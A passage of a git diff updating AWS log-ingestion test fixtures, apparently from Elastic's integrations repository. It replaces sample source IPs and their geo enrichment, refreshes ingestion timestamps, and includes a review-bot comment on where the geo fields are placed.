botocore/1.4.67]\",\"requestParameters\":{\"bucketName\":\"my-test-bucket-cross-account\"},\"responseElements\":null,\"requestID\":\"EXAMPLE463D56D4C\",\"eventID\":\"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"777788889999\"}", "provider": "s3.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log index f8a9bc9e2a3..9b440298c64 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log 
@@ -1,2 +1,2 @@
-{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"205.251.233.182","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"}
+{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"} 
{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"EXAMPLE_ID","arn":"arn:aws:iam::0123456789012:user/Alice","accountId":"0123456789012","accessKeyId":"EXAMPLE_KEY","userName":"Alice","sessionContext":{"sessionIssuer":{},"webIdFederationData":{},"attributes":{"mfaAuthenticated":"true","creationDate":"2020-01-08T15:12:16Z"}},"invokedBy":"signin.amazonaws.com"},"eventTime":"2020-01-08T20:58:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-west-2","sourceIPAddress":"127.0.0.1","userAgent":"signin.amazonaws.com","requestParameters":{"name":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","isMultiRegionTrail":true,"enableLogFileValidation":false,"kmsKeyId":""},"responseElements":{"name":"TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","snsTopicARN":"","includeGlobalServiceEvents":true,"isMultiRegionTrail":true,"trailARN":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","logFileValidationEnabled":false,"isOrganizationTrail":false},"requestID":"EXAMPLE-f3da-42d1-84f5-EXAMPLE","eventID":"EXAMPLE-b5e9-4846-8407-EXAMPLE","readOnly":false,"eventType":"AwsApiCall","recipientAccountId":"0123456789012"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json index e3486fecddc..754605022ee 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json 
@@ -3,25 +3,25 @@
 {
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-OR",
- "city_name": "Boardman",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Oregon",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -119.7143,
- "lat": 45.8491
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 16509,
+ "number": 29518,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Bredband2 AB"
 }
 },
- "address": "205.251.233.182",
- "ip": "205.251.233.182"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "tags": [
 "preserve_original_event" 
@@ -42,7 +42,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"205.251.233.182\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", + "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "cloudtrail.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", 
diff --git a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json
index d527126412f..8e4cce3a5fd 100644
--- a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json
+++ b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json
@@ -6,7 +6,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.696763200Z",
+ "ingested": "2021-12-09T16:11:58.525004600Z",
 "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root."
 },
 "aws": {
@@ -24,7 +24,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.696773100Z",
+ "ingested": "2021-12-09T16:11:58.525012700Z",
 "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms."
 },
 "aws": {
@@ -42,7 +42,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.696779400Z",
+ "ingested": "2021-12-09T16:11:58.525017900Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)"
 },
 "aws": {
@@ -60,7 +60,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.696787200Z",
+ "ingested": "2021-12-09T16:11:58.525022500Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)"
 },
 "aws": {
@@ -78,7 +78,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.696796900Z",
+ "ingested": "2021-12-09T16:11:58.525027400Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds."
 },
 "aws": { 
@@ -96,7 +96,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.696803300Z",
+ "ingested": "2021-12-09T16:11:58.525032300Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s"
 },
 "aws": {
diff --git a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json
index 3b392d73df2..4298569cb31 100644
--- a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json
+++ b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json
@@ -9,7 +9,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.871450600Z",
+ "ingested": "2021-12-09T16:11:58.684169900Z",
 "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root."
 },
 "aws": {
@@ -31,7 +31,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.871462200Z",
+ "ingested": "2021-12-09T16:11:58.684178100Z",
 "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms."
 },
 "aws": {
@@ -53,7 +53,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.871471900Z",
+ "ingested": "2021-12-09T16:11:58.684183300Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)"
 },
 "aws": {
@@ -75,7 +75,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.871481300Z",
+ "ingested": "2021-12-09T16:11:58.684188400Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)"
 },
 "aws": { 
@@ -97,7 +97,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.871490800Z",
+ "ingested": "2021-12-09T16:11:58.684193500Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds."
 },
 "aws": {
@@ -119,7 +119,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-07-19T21:47:04.871508100Z",
+ "ingested": "2021-12-09T16:11:58.684198500Z",
 "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s"
 },
 "aws": {
diff --git a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json
index fd112d6830d..baf96cc0f76 100644
--- a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json
+++ b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json
@@ -43,7 +43,7 @@
 }
 },
 "event": {
- "ingested": "2021-07-19T21:47:05.084930900Z",
+ "ingested": "2021-12-09T16:11:58.868846100Z",
 "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"",
 "kind": "event",
 "start": "2018-07-02T22:22:48.364000Z",
diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log
index e56b8a34ed9..bcc9f6af0d2 100644
--- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log 
+++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log 
@@ -1,7 +1,7 @@ -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 17 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 3 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1" 200 - 265 - 2 1 "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 
vendor/Oracle_Corporation" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 4 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA 
REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 17 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 3 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1" 200 - 265 - 2 1 "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 
+0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 4 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz "PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1" 200 - - 773 103 13 "-" "-" - 
02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 -
diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json
index 05517ceda6a..abd3a9e4751 100644
--- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json
+++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json
@@ -10,15 +10,15 @@
 "preserve_original_event"
 ],
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Virginia",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "cloud": {
@@ -32,7 +32,7 @@
 "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2"
 ],
 "ip": [
- "72.21.217.31"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -51,8 +51,8 @@
 "user": {
 "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9"
 },
- "address": "72.21.217.31",
- "ip": "72.21.217.31"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "tls": {
 "cipher": "ECDHE-RSA-AES128-SHA", 
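Review bot: In the `@@ -10,15 +10,15 @@` hunk the regenerated `geo` block sits at the document root, as a sibling of `tags` and `cloud`, while the `source` object in the `@@ -51,8 +51,8 @@` hunk carries `user`, `address` and `ip` but no `geo`; the cloudtrail fixtures earlier in this diff place the identical block under `source.geo`. If that reflects the s3access pipeline's geoip `target_field` rather than an artefact of how this page was rendered, ECS-based consumers keyed on `source.geo.*` (detection rules, map visualisations) will not see the enrichment for this data stream, and the fixture will keep asserting the non-ECS layout on every regeneration. The same shape repeats in the second event's `@@ -117,15 +117,15 @@` hunk below. Since this commit only swaps the test IP, it is worth confirming against the pipeline definition and tracking the field placement as a separate follow-up rather than widening this change.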
@@ -61,8 +61,8 @@ }, "event": { "duration": 17000000, - "ingested": "2021-07-19T21:47:05.259665700Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134194800Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA 